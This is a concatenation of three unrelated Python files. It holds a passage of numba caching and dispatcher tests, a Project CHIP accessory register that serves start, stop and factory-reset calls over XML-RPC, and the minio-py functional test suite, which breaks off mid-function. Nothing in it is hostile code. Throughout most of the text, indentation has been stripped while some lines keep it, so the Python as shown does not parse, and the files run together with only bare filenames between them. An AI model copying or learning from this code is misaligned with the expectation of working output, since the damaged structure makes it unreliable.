modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
            # Make sure we can spawn a new process without inheriting
            # the parent context.
            mp = multiprocessing.get_context('spawn')
        except ValueError:
            # The 'spawn' context is unavailable; skip rather than fall
            # through to an undefined `mp` below.
            self.skipTest("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestCacheMultipleFilesWithSignature(unittest.TestCase):
# Regression test for https://github.com/numba/numba/issues/3658
_numba_parallel_test_ = False
source_text_file1 = """
from file2 import function2
"""
source_text_file2 = """
from numba import njit
@njit('float64(float64)', cache=True)
def function1(x):
return x
@njit('float64(float64)', cache=True)
def function2(x):
return x
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
self.file1 = os.path.join(self.tempdir, 'file1.py')
with open(self.file1, 'w') as fout:
print(self.source_text_file1, file=fout)
self.file2 = os.path.join(self.tempdir, 'file2.py')
with open(self.file2, 'w') as fout:
print(self.source_text_file2, file=fout)
def tearDown(self):
shutil.rmtree(self.tempdir)
    def test_caching_multiple_files_with_signature(self):
# Execute file1.py
popen = subprocess.Popen([sys.executable, self.file1],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
# Execute file2.py
popen = subprocess.Popen([sys.executable, self.file2],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
        # Test that a Dispatcher object can be passed as an argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_cannot_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
with self.assertRaises(TypeError) as raises:
foo(fn)
self.assertRegexpMatches(str(raises.exception),
"cannot convert native .* to Python object")
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
            # The boxing logic always raises for the Module type,
            # regardless of the returned value.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
class TestNoRetryFailedSignature(unittest.TestCase):
"""Test that failed-to-compile signatures are not recompiled.
"""
def run_test(self, func):
fcom = func._compiler
self.assertEqual(len(fcom._failed_cache), 0)
# expected failure because `int` has no `__getitem__`
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry with double
with self.assertRaises(errors.TypingError):
func(1.0)
self.assertEqual(len(fcom._failed_cache), 2)
def test_direct_call(self):
@jit(nopython=True)
def foo(x):
return x[0]
self.run_test(foo)
def test_nested_call(self):
@jit(nopython=True)
def bar(x):
return x[0]
@jit(nopython=True)
def foobar(x):
bar(x)
@jit(nopython=True)
def foo(x):
return bar(x) + foobar(x)
self.run_test(foo)
def test_error_count(self):
def check(field, would_fail):
            # Slightly modified from the reproducer in issue #4117.
            # Before the patch, the compilation time of the failing case was
            # much longer than that of the successful case. This can be
            # detected by the number of times `trigger()` is visited.
k = 10
counter = {'c': 0}
@generated_jit
def trigger(x):
# Keep track of every visit
counter['c'] += 1
if would_fail:
raise errors.TypingError("invoke_failed")
return lambda x: x
@jit(nopython=True)
def ident(out, x):
pass
def chain_assign(fs, inner=ident):
tab_head, tab_tail = fs[-1], fs[:-1]
@jit(nopython=True)
def assign(out, x):
inner(out, x)
out[0] += tab_head(x)
if tab_tail:
return chain_assign(tab_tail, assign)
else:
return assign
chain = chain_assign((trigger,) * k)
out = np.ones(2)
if would_fail:
with self.assertRaises(errors.TypingError) as raises:
chain(out, 1)
self.assertIn('invoke_failed', str(raises.exception))
else:
chain(out, 1)
# Returns the visit counts
return counter['c']
ct_ok = check('a', False)
ct_bad = check('c', True)
# `trigger()` is visited exactly once for both successful and failed
# compilation.
self.assertEqual(ct_ok, 1)
self.assertEqual(ct_bad, 1)
if __name__ == '__main__':
unittest.main()
accessories.py
#
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import sys
import threading
from xmlrpc.server import SimpleXMLRPCServer
IP = '127.0.0.1'
PORT = 9000
if sys.platform == 'linux':
IP = '10.10.10.5'
class AppsRegister:
_instance = None
__accessories = {}
def init(self):
self.__startXMLRPCServer()
def uninit(self):
self.__stopXMLRPCServer()
@property
def accessories(self):
"""List of registered accessory applications."""
return self.__accessories.values()
def add(self, name, accessory):
self.__accessories[name] = accessory
def remove(self, name):
self.__accessories.pop(name)
def removeAll(self):
self.__accessories = {}
def kill(self, name):
accessory = self.__accessories[name]
if accessory:
accessory.kill()
def killAll(self):
for accessory in self.__accessories.values():
accessory.kill()
def start(self, name, args):
accessory = self.__accessories[name]
if accessory:
# The args param comes directly from the sys.argv[1:] of Start.py and should contain a list of strings in
            # key-value pairs, e.g. [option1, value1, option2, value2, ...]
options = self.__createCommandLineOptions(args)
return accessory.start(options)
return False
def stop(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.stop()
return False
def reboot(self, name, args):
accessory = self.__accessories[name]
if accessory:
# The args param comes directly from the sys.argv[1:] of Reboot.py and should contain a list of strings in
            # key-value pairs, e.g. [option1, value1, option2, value2, ...]
options = self.__createCommandLineOptions(args)
return accessory.stop() and accessory.start(options)
return False
def factoryResetAll(self):
for accessory in self.__accessories.values():
accessory.factoryReset()
def factoryReset(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.factoryReset()
return False
def waitForCommissionableAdvertisement(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.waitForCommissionableAdvertisement()
return False
def waitForOperationalAdvertisement(self, name):
accessory = self.__accessories[name]
if accessory:
return accessory.waitForOperationalAdvertisement()
return False
def __startXMLRPCServer(self):
self.server = SimpleXMLRPCServer((IP, PORT))
self.server.register_function(self.start, 'start')
self.server.register_function(self.stop, 'stop')
self.server.register_function(self.reboot, 'reboot')
self.server.register_function(self.factoryReset, 'factoryReset')
self.server.register_function(
self.waitForCommissionableAdvertisement,
'waitForCommissionableAdvertisement')
self.server.register_function(
self.waitForOperationalAdvertisement,
'waitForOperationalAdvertisement')
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.start()
def __stopXMLRPCServer(self):
self.server.shutdown()
def __createCommandLineOptions(self, args):
if not args:
return {}
        # args should contain a list of strings in key-value pairs, e.g. [option1, value1, option2, value2, ...]
if (len(args) % 2) != 0:
            logging.warning("Unexpected command line options %r - not key/value pairs (odd length)", args)
return {}
# Create a dictionary from the key-value pair list
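        # Illustrative mapping (option names here are hypothetical):
        #   ['--discriminator', '3840', '--passcode', '20202021']
        #   -> {'--discriminator': '3840', '--passcode': '20202021'}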
options = {args[i]: args[i+1] for i in range(0, len(args), 2)}
return options
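
# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original accessories.py): the
# XML-RPC endpoints registered above can be driven from another process with
# the standard-library client. The accessory name and the option list below
# are hypothetical placeholders.
if __name__ == '__main__':
    from xmlrpc.client import ServerProxy

    proxy = ServerProxy('http://{}:{}'.format(IP, PORT))
    # args are flat key/value pairs, mirroring __createCommandLineOptions()
    started = proxy.start('example-accessory', ['--discriminator', '3840'])
    logging.info('start returned %r', started)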
tests.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# MinIO Python Library for Amazon S3 Compatible Cloud Storage,
# (C) 2015, 2016, 2017, 2018 MinIO, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=too-many-lines
"""Functional tests of minio-py."""
from __future__ import absolute_import, division
import hashlib
import io
import json
import math
import os
import random
import shutil
import sys
import tempfile
import time
import traceback
from datetime import datetime, timedelta
from threading import Thread
from uuid import uuid4
import certifi
import urllib3
from minio import CopyConditions, Minio, PostPolicy
from minio.commonconfig import ENABLED
from minio.deleteobjects import DeleteObject
from minio.error import S3Error
from minio.select.helpers import calculate_crc
from minio.selectrequest import (CSVInputSerialization, CSVOutputSerialization,
SelectRequest)
from minio.sse import SseCustomerKey
from minio.versioningconfig import VersioningConfig
if sys.version_info[0] == 2:
from datetime import tzinfo # pylint: disable=ungrouped-imports
class UTC(tzinfo):
"""UTC"""
def utcoffset(self, dt):
return timedelta(0)
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return timedelta(0)
UTC = UTC()
from inspect import getargspec
GETARGSSPEC = getargspec
else:
from datetime import timezone # pylint: disable=ungrouped-imports
UTC = timezone.utc
from inspect import getfullargspec # pylint: disable=ungrouped-imports
GETARGSSPEC = getfullargspec
_CLIENT = None # initialized in main().
_TEST_FILE = None # initialized in main().
_LARGE_FILE = None # initialized in main().
_IS_AWS = None # initialized in main().
KB = 1024
MB = 1024 * KB
HTTP = urllib3.PoolManager(
cert_reqs='CERT_REQUIRED',
ca_certs=os.environ.get('SSL_CERT_FILE') or certifi.where()
)
def _gen_bucket_name():
"""Generate random bucket name."""
return "minio-py-test-{0}".format(uuid4())
def _get_sha256sum(filename):
"""Get SHA-256 checksum of given file."""
with open(filename, 'rb') as file:
contents = file.read()
return hashlib.sha256(contents).hexdigest()
def _get_random_string(size):
"""Get random string of given size."""
if not size:
return ""
chars = "abcdefghijklmnopqrstuvwxyz"
chars *= int(math.ceil(size / len(chars)))
chars = list(chars[:size])
random.shuffle(chars)
return "".join(chars)
class LimitedRandomReader: # pylint: disable=too-few-public-methods
"""Random data reader of specified size."""
def __init__(self, limit):
self._limit = limit
def read(self, size=64*KB):
"""Read random data of specified size."""
if size < 0 or size > self._limit:
size = self._limit
data = _get_random_string(size)
self._limit -= size
return data.encode()
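# Usage sketch (illustrative, not part of the original file): the reader
# streams random data without materialising it all up front, which is how the
# put_object()/fput_object() tests below feed payloads of a given size:
#
#     reader = LimitedRandomReader(1 * KB)
#     chunk = reader.read()   # at most 1 KiB of random bytes
#     assert len(chunk) <= 1 * KB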
def _call(log_entry, func, *args, **kwargs):
"""Execute given function."""
log_entry["method"] = func
return func(*args, **kwargs)
class TestFailed(Exception):
"""Indicate test failed error."""
def _call_test(func, *args, **kwargs):
"""Execute given test function."""
log_entry = {
"name": func.__name__,
"status": "PASS",
}
start_time = time.time()
try:
func(log_entry, *args, **kwargs)
except S3Error as exc:
if exc.code == "NotImplemented":
log_entry["alert"] = "Not Implemented"
log_entry["status"] = "NA"
else:
log_entry["message"] = "{0}".format(exc)
log_entry["error"] = traceback.format_exc()
log_entry["status"] = "FAIL"
except Exception as exc: # pylint: disable=broad-except
log_entry["message"] = "{0}".format(exc)
log_entry["error"] = traceback.format_exc()
log_entry["status"] = "FAIL"
if log_entry.get("method"):
log_entry["function"] = "{0}({1})".format(
log_entry["method"].__name__,
# pylint: disable=deprecated-method
', '.join(GETARGSSPEC(log_entry["method"]).args[1:]))
log_entry["args"] = {
k: v for k, v in log_entry.get("args", {}).items() if v
}
log_entry["duration"] = int(
round((time.time() - start_time) * 1000))
log_entry["name"] = 'minio-py:' + log_entry["name"]
log_entry["method"] = None
print(json.dumps({k: v for k, v in log_entry.items() if v}))
if log_entry["status"] == "FAIL":
raise TestFailed()
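# Illustrative harness sketch (not part of this section): _CLIENT, _TEST_FILE
# and friends are normally initialized in main() from environment variables;
# the endpoint and credentials below are hypothetical placeholders showing how
# a single functional test would be driven, and the kind of one-line JSON log
# record that _call_test() prints.
#
#     _CLIENT = Minio('play.min.io', access_key='<ACCESS_KEY>',
#                     secret_key='<SECRET_KEY>', secure=True,
#                     http_client=HTTP)
#     _call_test(test_make_bucket_default_region)
#     # -> {"name": "minio-py:test_make_bucket_default_region",
#     #     "status": "PASS", "args": {...}, "duration": 123, ...}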
def test_make_bucket_default_region(log_entry):
"""Test make_bucket() with default region."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
"location": "default value ('us-east-1')", # Default location
}
# Create a bucket with default bucket location
_call(log_entry, _CLIENT.make_bucket, bucket_name)
# Check if bucket was created properly
_call(log_entry, _CLIENT.bucket_exists, bucket_name)
# Remove bucket
_call(log_entry, _CLIENT.remove_bucket, bucket_name)
# Test passes
log_entry["method"] = _CLIENT.make_bucket
def test_make_bucket_with_region(log_entry):
"""Test make_bucket() with region."""
# Only test make bucket with region against AWS S3
if not _IS_AWS:
return
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
# A non-default location
location = 'us-west-1'
log_entry["args"] = {
"bucket_name": bucket_name,
"location": location,
}
# Create a bucket with default bucket location
_call(log_entry, _CLIENT.make_bucket, bucket_name, location)
# Check if bucket was created properly
_call(log_entry, _CLIENT.bucket_exists, bucket_name)
# Remove bucket
_call(log_entry, _CLIENT.remove_bucket, bucket_name)
# Test passes
log_entry["method"] = _CLIENT.make_bucket
def test_negative_make_bucket_invalid_name( # pylint: disable=invalid-name
log_entry):
"""Test make_bucket() with invalid bucket name."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
# Default location
log_entry["args"] = {
"location": "default value ('us-east-1')",
}
# Create an array of invalid bucket names to test
invalid_bucket_name_list = [
bucket_name + '.',
'.' + bucket_name,
bucket_name + '...abcd'
]
for name in invalid_bucket_name_list:
log_entry["args"]["bucket_name"] = name
try:
# Create a bucket with default bucket location
_call(log_entry, _CLIENT.make_bucket, name)
# Check if bucket was created properly
_call(log_entry, _CLIENT.bucket_exists, name)
# Remove bucket
_call(log_entry, _CLIENT.remove_bucket, name)
except ValueError:
pass
# Test passes
log_entry["method"] = _CLIENT.make_bucket
log_entry["args"]['bucket_name'] = invalid_bucket_name_list
def test_list_buckets(log_entry):
"""Test list_buckets()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
# Create a bucket with default bucket location
_call(log_entry, _CLIENT.make_bucket, bucket_name)
try:
buckets = _CLIENT.list_buckets()
for bucket in buckets:
# bucket object should be of a valid value.
if bucket.name and bucket.creation_date:
continue
raise ValueError('list_bucket api failure')
finally:
# Remove bucket
_call(log_entry, _CLIENT.remove_bucket, bucket_name)
def test_select_object_content(log_entry):
"""Test select_object_content()."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
csvfile = 'test.csv'
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": csvfile,
}
try:
_CLIENT.make_bucket(bucket_name)
content = io.BytesIO(b"col1,col2,col3\none,two,three\nX,Y,Z\n")
_CLIENT.put_object(bucket_name, csvfile, content,
len(content.getvalue()))
request = SelectRequest(
"select * from s3object",
CSVInputSerialization(),
CSVOutputSerialization(),
request_progress=True,
)
data = _CLIENT.select_object_content(bucket_name, csvfile, request)
# Get the records
records = io.BytesIO()
for data_bytes in data.stream(10*KB):
records.write(data_bytes.encode('utf-8'))
expected_crc = calculate_crc(content.getvalue())
generated_crc = calculate_crc(records.getvalue())
if expected_crc != generated_crc:
            raise ValueError(
                'Data mismatch. Expected: '
                '"col1,col2,col3\none,two,three\nX,Y,Z\n", '
                'received: {0!r}'.format(records.getvalue()))
finally:
_CLIENT.remove_object(bucket_name, csvfile)
_CLIENT.remove_bucket(bucket_name)
def _test_fput_object(bucket_name, object_name, filename, metadata, sse):
"""Test fput_object()."""
try:
_CLIENT.make_bucket(bucket_name)
if _IS_AWS:
_CLIENT.fput_object(bucket_name, object_name, filename,
metadata=metadata, sse=sse)
else:
_CLIENT.fput_object(bucket_name, object_name, filename, sse=sse)
_CLIENT.stat_object(bucket_name, object_name, sse=sse)
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_fput_object_small_file(log_entry, sse=None):
"""Test fput_object() with small file."""
if sse:
log_entry["name"] += "_with_SSE-C"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}-f".format(uuid4())
metadata = {'x-amz-storage-class': 'STANDARD_IA'}
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"file_path": _TEST_FILE,
"metadata": metadata,
}
_test_fput_object(bucket_name, object_name, _TEST_FILE, metadata, sse)
def test_fput_object_large_file(log_entry, sse=None):
"""Test fput_object() with large file."""
if sse:
log_entry["name"] += "_with_SSE-C"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}-large".format(uuid4())
metadata = {'x-amz-storage-class': 'STANDARD_IA'}
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"file_path": _LARGE_FILE,
"metadata": metadata,
}
# upload local large file through multipart.
_test_fput_object(bucket_name, object_name, _LARGE_FILE, metadata, sse)
def test_fput_object_with_content_type( # pylint: disable=invalid-name
log_entry):
"""Test fput_object() with content-type."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}-f".format(uuid4())
metadata = {'x-amz-storage-class': 'STANDARD_IA'}
content_type = 'application/octet-stream'
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"file_path": _TEST_FILE,
"metadata": metadata,
"content_type": content_type,
}
_test_fput_object(bucket_name, object_name, _TEST_FILE, metadata, None)
def _validate_stat(st_obj, expected_size, expected_meta, version_id=None):
"""Validate stat information."""
expected_meta = {
key.lower(): value for key, value in (expected_meta or {}).items()
}
received_modification_time = st_obj.last_modified
received_etag = st_obj.etag
received_metadata = {
key.lower(): value for key, value in (st_obj.metadata or {}).items()
}
received_content_type = st_obj.content_type
received_size = st_obj.size
received_is_dir = st_obj.is_dir
if not isinstance(received_modification_time, time.struct_time):
raise ValueError('Incorrect last_modified time type'
', received type: ', type(received_modification_time))
if not received_etag:
raise ValueError('No Etag value is returned.')
if st_obj.version_id != version_id:
raise ValueError(
"version-id mismatch. expected={0}, got={1}".format(
version_id, st_obj.version_id,
),
)
# content_type by default can be either application/octet-stream or
# binary/octet-stream
if received_content_type not in [
'application/octet-stream', 'binary/octet-stream']:
raise ValueError('Incorrect content type. Expected: ',
"'application/octet-stream' or 'binary/octet-stream',"
" received: ", received_content_type)
if received_size != expected_size:
        raise ValueError('Incorrect file size. Expected: ', expected_size,
                         ', received: ', received_size)
if received_is_dir:
raise ValueError('Incorrect file type. Expected: is_dir=False',
', received: is_dir=', received_is_dir)
if not all(i in received_metadata.items() for i in expected_meta.items()):
raise ValueError("Metadata key 'x-amz-meta-testing' not found")
def test_copy_object_no_copy_condition( # pylint: disable=invalid-name
log_entry, ssec_copy=None, ssec=None):
"""Test copy_object() with no conditiions."""
if ssec_copy or ssec:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size, sse=ssec)
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
source_sse=ssec_copy, sse=ssec)
st_obj = _CLIENT.stat_object(bucket_name, object_copy, sse=ssec)
_validate_stat(st_obj, size, {})
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_with_metadata(log_entry):
"""Test copy_object() with metadata."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
metadata = {"testing-string": "string",
"testing-int": 1}
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
"metadata": metadata,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
# Perform a server side copy of an object
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
metadata=metadata)
# Verification
st_obj = _CLIENT.stat_object(bucket_name, object_copy)
expected_metadata = {'x-amz-meta-testing-int': '1',
'x-amz-meta-testing-string': 'string'}
_validate_stat(st_obj, size, expected_metadata)
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_etag_match(log_entry):
"""Test copy_object() with etag match condition."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
# Perform a server side copy of an object
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source)
# Verification
source_etag = _CLIENT.stat_object(bucket_name, object_source).etag
copy_conditions = CopyConditions()
copy_conditions.set_match_etag(source_etag)
log_entry["args"]["conditions"] = {'set_match_etag': source_etag}
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
copy_conditions)
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_negative_etag_match( # pylint: disable=invalid-name
log_entry):
"""Test copy_object() with etag not match condition."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
try:
# Perform a server side copy of an object
# with incorrect pre-conditions and fail
etag = 'test-etag'
copy_conditions = CopyConditions()
copy_conditions.set_match_etag(etag)
log_entry["args"]["conditions"] = {'set_match_etag': etag}
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
copy_conditions)
except S3Error as exc:
if exc.code != "PreconditionFailed":
raise
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_modified_since(log_entry):
"""Test copy_object() with modified since condition."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
# Set up the 'modified_since' copy condition
copy_conditions = CopyConditions()
mod_since = datetime(2014, 4, 1, tzinfo=UTC)
copy_conditions.set_modified_since(mod_since)
log_entry["args"]["conditions"] = {
'set_modified_since': mod_since.strftime('%c')}
# Perform a server side copy of an object
# and expect the copy to complete successfully
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
copy_conditions)
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_copy_object_unmodified_since( # pylint: disable=invalid-name
log_entry):
"""Test copy_object() with unmodified since condition."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
object_source = object_name + "-source"
object_copy = object_name + "-copy"
log_entry["args"] = {
"bucket_name": bucket_name,
"object_source": object_source,
"object_name": object_copy,
}
try:
_CLIENT.make_bucket(bucket_name)
# Upload a streaming object of 1 KiB
size = 1 * KB
reader = LimitedRandomReader(size)
_CLIENT.put_object(bucket_name, object_source, reader, size)
# Set up the 'unmodified_since' copy condition
copy_conditions = CopyConditions()
